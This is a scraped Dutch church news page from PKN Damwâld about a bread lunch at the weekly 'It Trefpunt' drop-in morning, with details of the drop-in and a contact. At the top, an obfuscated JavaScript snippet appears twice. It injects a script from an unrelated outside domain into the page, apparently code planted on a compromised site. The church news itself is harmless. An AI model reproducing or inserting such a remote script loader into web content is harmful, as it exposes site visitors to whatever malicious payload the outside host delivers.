;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gezellige broodmaaltijd tijdens de inloopochtend It Trefpunt - PKN Damwâld

Gezellige broodmaaltijd tijdens de inloopochtend It Trefpunt

Gepubliceerd op: donderdag 9 november

Op 9 november 2023 was het goed vertoeven bij de Inloopochtend It Trefpunt in Damwâld. Alle aanwezigen konden namelijk genieten van een heerlijke broodmaaltijd. Iedereen genoot zichtbaar  van het samenzijn. Het blijft altijd weer bijzonder om met elkaar aan tafel te gaan en te genieten van alle goede gaven. Het levert altijd weer verrassende ontmoetingen, mooie gesprekken en een hele boel gezelligheid op.

Elke week op donderdagmorgen, is er inloop vanaf 9.30 uur. In 2016 is  hiermee gestart en er is steeds veel belangstelling. Iedereen oud en jong en kerkelijk of niet is van harte welkom. Er is gratis koffie/thee/fris en u kunt er de krant lezen, spelletjes doen of gezellig met elkaar praten. Er zijn veel boeken om te lezen die u, als u die nog niet uit hebt, mee kunt nemen naar huis. U mag ook uw eigen boeken inleveren. Er liggen tijdschriften en encyclopedieën om in te kijken. Regelmatig is er tijd voor het maken van bloemstukjes of gaan we met z’n allen iets gezelligs doen. Mocht er kapotte spullen zijn, en als dat financieel moeilijk is om die te laten maken, kunnen we adviseren en hulp regelen.
We willen meegaan met het initiatief warme woonkamers. Daarvoor bent u welkom voor een kop koffie of een sociaal gesprek, om thuis de verwarming even wat lager te zetten. Er staat een pot voor een vrijwillige bijdrage.

Meer weten over de Inloopochtend ? Contactpersoon is Pieter Huizenga, Ds. Germswei 29, 06-12293838.